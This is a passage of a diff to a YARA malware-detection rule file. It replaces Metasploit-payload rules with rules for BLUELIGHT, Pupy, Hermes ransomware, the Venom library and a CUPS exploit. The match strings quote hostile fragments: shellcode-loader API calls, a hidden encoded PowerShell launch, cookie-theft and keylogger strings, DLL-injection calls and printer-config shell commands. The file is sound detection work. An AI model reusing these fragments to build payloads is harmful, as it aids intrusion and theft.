+		$s1 = "start anhao1.exe -i S.txt -p  pass1.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
+		$s2 = "start anhao2.exe -i S.txt -p  pass2.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x7473 and filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_3
+rule SIGNATURE_BASE_Sql1433_Start : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.psh"
+		description = "Chinese Hacktool Set - file Start.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ad09167f-a12a-5f07-940b-df679fa8e6c0"
-		date = "2017-02-09"
+		id = "89bc249d-dba0-5196-b081-ddbd029ae6c8"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L79-L102"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L127-L145"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d1aeb97c19365f996dc1bc0fd6e01342878967be25d3e042158eba986af28b4a"
+		hash = "bd4be10f4c3a982647b2da1a8fb2e19de34eaf01"
+		logic_hash = "b7dfc2b04e838fa3a71487287a50e183443eb62b69cd23494294f231b43baf2f"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "335cfb85e11e7fb20cddc87e743b9e777dc4ab4e18a39c2a2da1aa61efdbd054"
 
 	strings:
-		$s1 = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(" ascii
-		$s2 = "public enum MemoryProtection { ExecuteReadWrite = 0x40 }" fullword ascii
-		$s3 = ".func]::VirtualAlloc(0,"
-		$s4 = ".func+AllocationType]::Reserve -bOr [" ascii
-		$s5 = "New-Object System.CodeDom.Compiler.CompilerParameters" fullword ascii
-		$s6 = "ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" fullword ascii
-		$s7 = "public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }" fullword ascii
-		$s8 = ".func]::CreateThread(0,0,$" fullword ascii
-		$s9 = "public enum Time : uint { Infinite = 0xFFFFFFFF }" fullword ascii
-		$s10 = "= [System.Convert]::FromBase64String(\"/" ascii
-		$s11 = "{ $global:result = 3; return }" fullword ascii
+		$s1 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s2 = "start creck.bat" fullword ascii
+		$s3 = "del s1.txt" fullword ascii
+		$s4 = "del Result.txt" fullword ascii
+		$s5 = "del s.TXT" fullword ascii
+		$s6 = "mode con cols=48 lines=20" fullword ascii
 
 	condition:
-		4 of them
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_4
+rule SIGNATURE_BASE_APT_MAL_Win_Bluelight_B : INKYSQUID
 {
 	meta:
-		description = "Metasploit Payloads - file msf.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "00d7681b-6041-5fe1-adbb-8b7c40df0193"
-		date = "2017-02-09"
+		description = "North Korean origin malware which uses a custom Google App for c2 communications."
+		author = "threatintel@volexity.com"
+		id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
+		date = "2021-06-21"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L104-L121"
+		reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt37_bluelight.yar#L12-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8e84ef13aa72c7c35520b3534b908c7d00240915ab02f8216a2cef6440c322a2"
+		logic_hash = "a6e83ca2ae15f1a7819f065449f84166da401739d091565605d62ebba3d47a50"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "26b3e572ba1574164b76c6d5213ab02e4170168ae2bcd2f477f246d37dbe84ef"
+		quality = 60
+		tags = "INKYSQUID"
+		hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed"
+		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
 
 	strings:
-		$s1 = "= VirtualAlloc(IntPtr.Zero,(UIntPtr)" ascii
-		$s2 = ".Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);" ascii
-		$s3 = "[System.Runtime.InteropServices.DllImport(\"kernel32\")]" fullword ascii
-		$s4 = "private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;" fullword ascii
-		$s5 = "private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);" fullword ascii
+		$magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d"
+		$f1 = "%ls.INTEG.RAW" wide
+		$f2 = "edb.chk" ascii
+		$f3 = "edb.log" ascii
+		$f4 = "edbres00001.jrs" ascii
+		$f5 = "edbres00002.jrs" ascii
+		$f6 = "edbtmp.log" ascii
+		$f7 = "cheV01.dat" ascii
+		$chrome1 = "Failed to get chrome cookie"
+		$chrome2 = "mail.google.com, cookie_name: OSID"
+		$chrome3 = ".google.com, cookie_name: SID,"
+		$chrome4 = ".google.com, cookie_name: __Secure-3PSID,"
+		$chrome5 = "Failed to get Edge cookie"
+		$chrome6 = "google.com, cookie_name: SID,"
+		$chrome7 = "google.com, cookie_name: __Secure-3PSID,"
+		$chrome8 = "Failed to get New Edge cookie"
+		$chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
+		$chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
+		$chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
+		$chrome12 = "https://mail.google.com"
+		$chrome13 = "result.html"
+		$chrome14 = "GM_ACTION_TOKEN"
+		$chrome15 = "GM_ID_KEY="
+		$chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs"
+		$chrome17 = "p_bx_ie=1"
+		$chrome18 = "myaccount.google.com, cookie_name: OSID"
+		$chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"
+		$chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
+		$chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
+		$chrome22 = "https://myaccount.google.com"
+		$chrome23 = "result.html"
+		$chrome24 = "myaccount.google.com"
+		$chrome25 = "/_/AccountSettingsUi/data/batchexecute"
+		$chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at="
+		$chrome27 = "response.html"
+		$msg1 = "https_status is %s"
+		$msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY"
+		$msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY"
+		$msg4 = "Failed HttpSendRequest to mail.google.com"
+		$msg5 = "Success to enable imap"
+		$msg6 = "Failed to enable imap"
+		$msg7 = "Success to find SNlM0e"
+		$msg8 = "Failed to find SNlM0e"
+		$msg9 = "Failed HttpSendRequest to myaccount.google.com"
+		$msg10 = "Success to enable thunder access"
+		$msg11 = "Failed to enable thunder access"
+		$keylogger_component1 = "[TAB]"
+		$keylogger_component2 = "[RETURN]"
+		$keylogger_component3 = "PAUSE"
+		$keylogger_component4 = "[ESC]"
+		$keylogger_component5 = "[PAGE UP]"
+		$keylogger_component6 = "[PAGE DOWN]"
+		$keylogger_component7 = "[END]"
+		$keylogger_component8 = "[HOME]"
+		$keylogger_component9 = "[ARROW LEFT]"
+		$keylogger_component10 = "[ARROW UP]"
+		$keylogger_component11 = "[ARROW RIGHT]"
+		$keylogger_component12 = "[ARROW DOWN]"
+		$keylogger_component13 = "[INS]"
+		$keylogger_component14 = "[DEL]"
+		$keylogger_component15 = "[WIN]"
+		$keylogger_component16 = "[NUM *]"
+		$keylogger_component17 = "[NUM +]"
+		$keylogger_component18 = "[NUM ,]"
+		$keylogger_component19 = "[NUM -]"
+		$keylogger_component20 = "[NUM .]"
+		$keylogger_component21 = "NUM /]"
+		$keylogger_component22 = "[NUMLOCK]"
+		$keylogger_component23 = "[SCROLLLOCK]"
+		$keylogger_component24 = "Time: "
+		$keylogger_component25 = "Window: "
+		$keylogger_component26 = "CAPSLOCK+"
+		$keylogger_component27 = "SHIFT+"
+		$keylogger_component28 = "CTRL+"
+		$keylogger_component29 = "ALT+"
 
 	condition:
-		4 of them
+		$magic or ( all of ( $f* ) and 5 of ( $keylogger_component* ) ) or 24 of ( $chrome* ) or 4 of ( $msg* ) or 27 of ( $keylogger_component* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Exe_2
+rule SIGNATURE_BASE_APT_MAL_Win_Bluelight : INKYSQUID
 {
 	meta:
-		description = "Metasploit Payloads - file msf-exe.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a55a33e1-8f04-5417-af0c-b7e2da36fb46"
-		date = "2017-02-09"
+		description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications."
+		author = "threatintel@volexity.com"
+		id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
+		date = "2021-04-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L123-L139"
+		reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt37_bluelight.yar#L114-L144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bd82f496ade1a62e0aee8c8c90cee84377cb90adf11c87652082e74c8c85e568"
+		logic_hash = "52589348f42aadbe453ad8a40ac36b58fcc9e07cd298486f09b6f793823d8cc7"
 		score = 75
-		quality = 83
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3a2f7a654c1100e64d8d3b4cd39165fba3b101bbcce6dd0f70dae863da338401"
+		quality = 85
+		tags = "INKYSQUID"
+		hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d"
+		hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a"
+		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
 
 	strings:
-		$x1 = "= new System.Diagnostics.Process();" fullword ascii
-		$x2 = ".StartInfo.UseShellExecute = true;" fullword ascii
-		$x3 = ", \"svchost.exe\");" ascii
-		$s4 = " = Path.GetTempPath();" ascii
+		$pdb1 = "\\Development\\BACKDOOR\\ncov\\"
+		$pdb2 = "Release\\bluelight.pdb"
+		$msg0 = "https://ipinfo.io" fullword
+		$msg1 = "country" fullword
+		$msg5 = "\"UserName\":\"" fullword
+		$msg7 = "\"ComName\":\"" fullword
+		$msg8 = "\"OS\":\"" fullword
+		$msg9 = "\"OnlineIP\":\"" fullword
+		$msg10 = "\"LocalIP\":\"" fullword
+		$msg11 = "\"Time\":\"" fullword
+		$msg12 = "\"Compiled\":\"" fullword
+		$msg13 = "\"Process Level\":\"" fullword
+		$msg14 = "\"AntiVirus\":\"" fullword
+		$msg15 = "\"VM\":\"" fullword
 
 	condition:
-		all of them
+		any of ( $pdb* ) or all of ( $msg* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_5
+
+rule SIGNATURE_BASE_Pupy_Backdoor : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.msi"
+		description = "Detects Pupy backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "030d1982-c9a8-539d-a995-7901ae425857"
-		date = "2017-02-09"
+		id = "11509847-3454-5412-b3e1-02ad9cccc6ae"
+		date = "2017-08-11"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L141-L156"
+		reference = "https://github.com/n1nj4sec/pupy-binaries"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_pupy_rat.yar#L13-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb602670329391b091f87818a0f5defaa8f688f7921978510739b96ca63a2f12"
+		logic_hash = "0b12376c9cddc71f584314b07fb29fac189349b526c6d5028f475fa3984401ae"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a6c66dfc998bf5838993e40026e1f400acd018bde8d4c01ef2e2e8fba507065"
+		hash1 = "ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153"
+		hash2 = "83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4"
+		hash3 = "90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc"
+		hash4 = "20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8"
+		hash5 = "06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e"
+		hash6 = "be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2"
+		hash7 = "8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01"
 
 	strings:
-		$s1 = "required to install Foobar 1.0." fullword ascii
-		$s2 = "Copyright 2009 The Apache Software Foundation." fullword wide
-		$s3 = "{50F36D89-59A8-4A40-9689-8792029113AC}" fullword ascii
+		$x1 = "reflectively inject a dll into a process." fullword ascii
+		$x2 = "ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid" fullword ascii
+		$x3 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" fullword ascii
+		$x4 = "reflective_inject_dll" fullword ascii
+		$x5 = "ld_preload_inject_dll" fullword ascii
+		$x6 = "get_pupy_config() -> string" fullword ascii
+		$x7 = "[INJECT] inject_dll. OpenProcess failed." fullword ascii
+		$x8 = "reflective_inject_dll" fullword ascii
+		$x9 = "reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)" fullword ascii
+		$x10 = "linux_inject_main" fullword ascii
 
 	condition:
-		all of them
+		(( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and filesize < 7000KB and 1 of them ) or 3 of them or ( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "84a69bce2ff6d9f866b7ae63bd70b163" )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_6
+rule SIGNATURE_BASE_PUP_Installrex_Antifwb : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.vbs"
+		description = "Malware InstallRex / AntiFW"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5485102b-e709-5111-814a-e6878b4bd889"
-		date = "2017-02-09"
+		id = "b327527e-8b88-5292-933b-102bd76df4eb"
+		date = "2015-05-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L158-L177"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_antifw_installrex.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b9498828a55477049922e50329d0c38ee34b8484562113a2686669ccbb8b3318"
-		score = 75
+		hash = "bb5607cd2ee51f039f60e32cf7edc4e21a2d95cd"
+		logic_hash = "04f25497ee9a9af20179b81679d993315d6bb3d7bf7d8e9cbb01374395019610"
+		score = 55
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8d6f55c6715c4a2023087c3d0d7abfa21e31a629393e4dc179d31bb25b166b3f"
 
 	strings:
-		$s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
-		$s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$s3 = ".GetSpecialFolder(2)" ascii
-		$s4 = ".Write Chr(CLng(\"" ascii
-		$s5 = "= \"4d5a90000300000004000000ffff00" ascii
-		$s6 = "For i = 1 to Len(" ascii
-		$s7 = ") Step 2" ascii
+		$s4 = "Error %u while loading TSU.DLL %ls" fullword ascii
+		$s7 = "GetModuleFileName() failed => %u" fullword ascii
+		$s8 = "TSULoader.exe" fullword wide
+		$s15 = "\\StringFileInfo\\%04x%04x\\Arguments" wide
+		$s17 = "Tsu%08lX.dll" fullword wide
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_7
+rule SIGNATURE_BASE_HKTL_Venom_LIB_Dec22 : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.vba"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8d1b742e-510a-5807-ad3f-f10cc325d292"
-		date = "2017-02-09"
+		description = "Detects Venom - a library that meant to perform evasive communication using stolen browser socket"
+		author = "Ido Veltzman, Florian Roth"
+		id = "b13b8a9c-52a4-53ac-817e-9f729fbf17c2"
+		date = "2022-12-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L179-L194"
+		reference = "https://github.com/Idov31/Venom"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hktl_venom_lib.yar#L2-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "167d295de5ffc9c88cf72f086fef4514f08cc3b9dd2d93b3ec36acffd6430370"
+		logic_hash = "fa143946479a45b272d507c3aa2b17026bfdcbb4abefd833f95ff78537568ec1"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "425beff61a01e2f60773be3fcb74bdfc7c66099fe40b9209745029b3c19b5f2f"
+		tags = "FILE"
 
 	strings:
-		$s1 = "Private Declare PtrSafe Function CreateThread Lib \"kernel32\" (ByVal" ascii
-		$s2 = "= VirtualAlloc(0, UBound(Tsw), &H1000, &H40)" fullword ascii
-		$s3 = "= RtlMoveMemory(" ascii
+		$x1 = "[ + ] Created detached hidden msedge process: " fullword ascii
+		$ss1 = "WS2_32.dll" fullword ascii
+		$ss2 = "WSASocketW" fullword ascii
+		$ss3 = "WSADuplicateSocketW" fullword ascii
+		$ss5 = "\\Device\\Afd" wide fullword
+		$sx1 = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe --no-startup-window" fullword wide
+		$sx2 = "[ + ] Data sent!" fullword ascii
+		$sx3 = "[ + ] Socket obtained!" fullword ascii
+		$op1 = { 4c 8b f0 48 3b c1 48 b8 ff ff ff ff ff ff ff 7f }
+		$op2 = { 48 8b cf e8 1c 34 00 00 48 8b 5c 24 30 48 8b c7 }
+		$op3 = { 48 8b da 48 8b f9 45 33 f6 48 85 c9 0f 84 34 01 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( ( 3 of ( $ss* ) and all of ( $op* ) ) or 2 of ( $sx* ) ) or $x1 or all of ( $sx* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_8
+rule SIGNATURE_BASE_EXPL_LNX_CUPS_CVE_2024_47177_Sep24 : CVE_2024_47177 FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "54466663-12ef-5fa4-a13c-e80ddbc0f4f8"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L196-L215"
+		description = "Detects exploit code for CUPS CVE-2024-47177"
+		author = "Florian Roth"
+		id = "a7b986ad-e943-5350-a6e0-34c40f07874c"
+		date = "2024-09-27"
+		modified = "2024-12-12"
+		reference = "https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cups_sep24.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d2b26276843cdfef2d1458ee6c3e2ecea962d1cd42bc21b86ebd03599bebcbc6"
+		logic_hash = "633314dea5e3cbdf3cef6e4f18c2efca261dfc600bb9c11d0834fdae102ac9e6"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "519717e01f0cb3f460ef88cd70c3de8c7f00fb7c564260bd2908e97d11fde87f"
+		tags = "CVE-2024-47177, FILE"
 
 	strings:
-		$s1 = "[DllImport(\"kernel32.dll\")]" fullword ascii
-		$s2 = "[DllImport(\"msvcrt.dll\")]" fullword ascii
-		$s3 = "-Name \"Win32\" -namespace Win32Functions -passthru" fullword ascii
-		$s4 = "::VirtualAlloc(0,[Math]::Max($" ascii
-		$s5 = ".Length,0x1000),0x3000,0x40)" ascii
-		$s6 = "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);" fullword ascii
-		$s7 = "::memset([IntPtr]($" ascii
+		$s1 = "FoomaticRIPCommandLine: " ascii
+		$s2 = "cupsFilter2 : " ascii
 
 	condition:
-		6 of them
+		filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Cmd
+rule SIGNATURE_BASE_SUSP_EXPL_LNX_CUPS_CVE_2024_47177_Sep24 : CVE_2024_47177
 {
 	meta:
-		description = "Metasploit Payloads - file msf-cmd.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "71d42c34-a0b0-5173-8f2f-f48a7af0e4ff"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L217-L230"
+		description = "Detects suspicious FoomaticRIPCommandLine command in printer config, which could be used to exploit CUPS CVE-2024-47177"
+		author = "Florian Roth"
+		id = "cb76f1c7-6dc0-5fed-a970-2a4890db46d3"
+		date = "2024-09-27"
+		modified = "2024-12-12"
+		reference = "https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cups_sep24.yar#L17-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ea44b3d00733eb7d4f924ccaece5265fcd90a462acb954a134b5355ecb0621e5"
-		score = 75
+		logic_hash = "2158ca8a08cb7552e2a437de025e3aad63ddc5417245e6ede7283d3bd0fc159b"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9f41932afc9b6b4938ee7a2559067f4df34a5c8eae73558a3959dd677cb5867f"
+		tags = "CVE-2024-47177"
 
 	strings:
-		$x1 = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e" ascii
+		$ = "FoomaticRIPCommandLine: \"bash " ascii
+		$ = "FoomaticRIPCommandLine: \"sh " ascii
+		$ = "FoomaticRIPCommandLine: \"python " ascii
+		$ = "FoomaticRIPCommandLine: \"perl " ascii
+		$ = "FoomaticRIPCommandLine: \"echo " ascii
+		$ = "FoomaticRIPCommandLine: \\\"bash " ascii
+		$ = "FoomaticRIPCommandLine: \\\"sh " ascii
+		$ = "FoomaticRIPCommandLine: \\\"python " ascii
+		$ = "FoomaticRIPCommandLine: \\\"perl " ascii
+		$ = "FoomaticRIPCommandLine: \\\"echo " ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_9 : FILE
+rule SIGNATURE_BASE_Hermes2_1 : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.war - contents"
-		author = "Florian Roth (Nextron Systems)"
-		id = "488a2e97-ebc2-5ccf-ab5d-dfed4b534b52"
-		date = "2017-02-09"
+		description = "Detects Hermes Ransomware as used in BAE report on FEIB"
+		author = "BAE"
+		id = "13397a43-04e1-5cc1-9260-9895736013f3"
+		date = "2017-10-11"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L232-L252"
+		reference = "https://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_hermes_ransom.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5761b51b79f83c48deafaf3786cb90ef493ab0448cd67b86655cecb0160a627"
+		hash = "b27881f59c8d8cc529fa80a58709db36"
+		logic_hash = "85a7b3ec89f2bf32e5520a7c5c84661383be71abd8dae3d072d75d5b1118db24"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81"
 
 	strings:
-		$s1 = "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1)" fullword ascii
-		$s2 = ".concat(\".exe\");" fullword ascii
-		$s3 = "[0] = \"chmod\";" ascii
-		$s4 = "= Runtime.getRuntime().exec(" ascii
-		$s5 = ", 16) & 0xff;" ascii
-		$x1 = "4d5a9000030000000" ascii
+		$s1 = "SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\"
+		$s2 = "0419"
+		$s3 = "0422"
+		$s4 = "0423"
+		$S1 = "HERMES"
+		$S2 = "vssadminn"
+		$S3 = "finish work"
+		$S4 = "testlib.dll"
+		$S5 = "shadowstorageiet"
+		$u1 = "ALKnvfoi4tbmiom3t40iomfr0i3t4jmvri3tb4mvi3btv3rgt4t777"
+		$u2 = "HERMES 2.1 TEST BUILD, press ok"
+		$u3 = "hnKwtMcOadHwnXutKHqPvpgfysFXfAFTcaDHNdCnktA"
 
 	condition:
-		4 of ( $s* ) or ( uint32( 0 ) == 0x61356434 and $x1 at 0 )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 3 of ( $S* ) and 1 of ( $u* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_10 : FILE
+rule SIGNATURE_BASE_Trojandownloader : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.exe"
+		description = "Trojan Downloader - Flash Exploit Feb15"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3bc3b66a-9f8a-55c2-ae2a-00faa778cef7"
-		date = "2017-02-09"
+		id = "d61f59ef-31a3-5e52-9525-61910bb150db"
+		date = "2015-02-11"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L254-L269"
+		reference = "http://goo.gl/wJ8V1I"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_generic.yar#L4-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c772fdc40e110ef1287da680dc4ef1718b86856abab4d814ec7bc2ee1e7808ee"
-		score = 75
-		quality = 85
+		hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
+		logic_hash = "4911098beea1d348d41d6a38c03b343bb7b8a8090ba664fd4b0747045127c686"
+		score = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
